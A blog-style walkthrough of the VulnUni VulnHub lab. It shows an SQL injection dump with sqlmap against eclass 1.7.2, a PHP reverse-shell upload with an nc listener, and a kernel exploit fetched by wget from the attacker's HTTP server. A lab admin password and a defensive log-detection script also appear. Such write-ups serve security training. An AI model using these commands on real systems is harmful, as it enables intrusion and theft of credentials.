VulnUni: 1.0.1 | walkthrough |writeup| vulnhub

Sagar Jain
5 min read · Apr 24, 2020

DESCRIPTION:

Welcome to "Vuln Uni"!

This boot2root machine is realistic without any CTF elements and pretty straightforward.

Goal: Hack your University and get root access to the server.

To successfully complete the challenge you need to get user and root flags.

Difficulty: Easy / Beginner Level

https://emaragkos.gr/vulnhub-writeups/vulnhub-boot2root-machine-vulnuni/

Need hints? Twitter @emaragkos

DHCP is enabled

Your feedback is really valuable for me!

Was there something that you didn’t like about this VM?

Please let me know so that I can make more interesting challenges in the future.

Good luck and have fun :)

## Changelog
v1.0.1 - 2020-03-20
v1.0 - 2020/03-19

DOWNLOAD LINK: https://download.vulnhub.com/vulnuni/vulnuni1.0.1.ova

Let's find the machine's IP address with the tool netdiscover:

netdiscover -i vboxnet0

netdiscover
  • -i device: your network device
  • to find the name of your network device, use the ifconfig command
network device name

Now let's start with an nmap scan:

nmap -v -sCV -A -O -p- 192.168.56.103

PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: VulnUni — We train the top Information Security Professionals

Only one port is open here, so let's enumerate it.

@port 80:

home page @port 80

Let's browse the whole site manually and check the source code as well.

The source code of the courses page contains a comment saying to disable the page “vulnuni-eclass-platform.html” until the new version is installed.

source-code comment

Let's visit the page named in the comment manually.

login

It redirects to the login page.

The page is not found because of the A record: the link redirects to “vulnuni.local/vulnuni-eclass/index.php”, a hostname our machine cannot resolve yet.

Let's edit our hosts file:

vim /etc/hosts

hosts file

Let's try again.

login page of eclass

Here it is. I tried some default usernames and passwords like admin:admin and user:password, but they didn’t work.

The page shows the installed eclass version, so let's google for vulnerabilities in eclass version 1.7.2.

version 1.7.2

There is an error-based SQL injection vulnerability on a particular parameter.

vulnerability explanation @exploitdb 48106

Let's use these parameters. As we don’t have an account, we will go for time-based blind injection, as described in the exploit above.

sqlmap -u "http://vulnuni.local/vulnuni-eclass/index.php" --dump -D eclass -T user -C username,password --forms --crawl=2

final result of sqlmap

The credentials extracted from MySQL give a login with admin privileges:

admin : ilikecats89

login as admin

Let's follow the other part of the same exploit to get a reverse shell.

exploitdb 48106

Following the exploit, navigate to /modules/course_info/restore_course.php.

Compress the shell into a zip file:

zip bla.zip php-reverse-shell.php

Upload the zip file and start an nc listener:

nc -lvp 4455

Now we just have to request the given location, “/courses/tmpUnzipping/php-reverse-shell.php”, in the browser to get a shell.

got shell

Got a shell as www-data and converted it into a stty shell.

flag.txt
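
Seen from the defender's side, the upload-and-execute chain above leaves a clear trail in the Apache access log. The following is an added example, not part of the original writeup or of the eclass project: a log check that flags sqlmap's default User-Agent and any PHP request under /courses/tmpUnzipping/. The combined log format, the function name detect and the sample log lines are assumptions constructed for illustration.

```python
import re

# Apache "combined" log format is assumed; the sample lines below are constructed.
LINE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'\d{3} \S+(?: "[^"]*" "(?P<ua>[^"]*)")?'
)
UPLOAD = "/modules/course_info/restore_course.php"  # restore page named in the writeup
UNZIP_PHP = re.compile(r"/courses/tmpUnzipping/[^?]*\.php", re.I)

def detect(lines):
    """Return findings as (client_ip, rule, path) tuples, in log order."""
    findings, uploaders, scanners = [], set(), set()
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        ip, path = m["ip"], m["path"]
        # sqlmap announces itself unless the operator overrides the User-Agent.
        if "sqlmap" in (m["ua"] or "").lower() and ip not in scanners:
            scanners.add(ip)
            findings.append((ip, "sqlmap-user-agent", path))
        # Remember which clients pushed an archive to the course-restore page.
        if m["method"] == "POST" and path.split("?")[0].endswith(UPLOAD):
            uploaders.add(ip)
        # A PHP file requested from the unzip scratch directory is the web-shell step.
        if UNZIP_PHP.search(path):
            rule = "upload-then-exec" if ip in uploaders else "php-in-tmpUnzipping"
            findings.append((ip, rule, path))
    return findings

SAMPLE = [  # constructed log lines
    '192.168.56.1 - - [24/Apr/2020:10:00:01 +0000] "POST /vulnuni-eclass/index.php HTTP/1.1" 200 4821 "-" "sqlmap/1.4 (http://sqlmap.org)"',
    '192.168.56.1 - - [24/Apr/2020:10:05:10 +0000] "POST /vulnuni-eclass/modules/course_info/restore_course.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.168.56.1 - - [24/Apr/2020:10:05:40 +0000] "GET /vulnuni-eclass/courses/tmpUnzipping/php-reverse-shell.php HTTP/1.1" 200 93 "-" "Mozilla/5.0"',
    '192.168.56.20 - - [24/Apr/2020:10:06:00 +0000] "GET /vulnuni-eclass/courses/tmpUnzipping/x.php?a=1 HTTP/1.1" 404 210 "-" "Mozilla/5.0"',
    '192.168.56.30 - - [24/Apr/2020:10:07:00 +0000] "GET /vulnuni-eclass/index.php HTTP/1.1" 200 4821 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in detect(SAMPLE):
        print(finding)
```

The User-Agent rule only catches default sqlmap runs, so the path-based rules are the more durable signal.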

Privilege Escalation:

I didn’t find anything interesting on the box other than the kernel version, which is exploitable. I have downloaded the exploit, which I found on GitHub.

Download it to the victim machine with the help of a Python HTTP server:

python -m SimpleHTTPServer 1234

wget http://192.168.56.1:1234/exploit.c

Let's compile the exploit and run it:

gcc exploit.c -o exploit -Wall -ldl -lpthread

chmod +x exploit

./exploit

flag.txt

got ROOT

DONE.
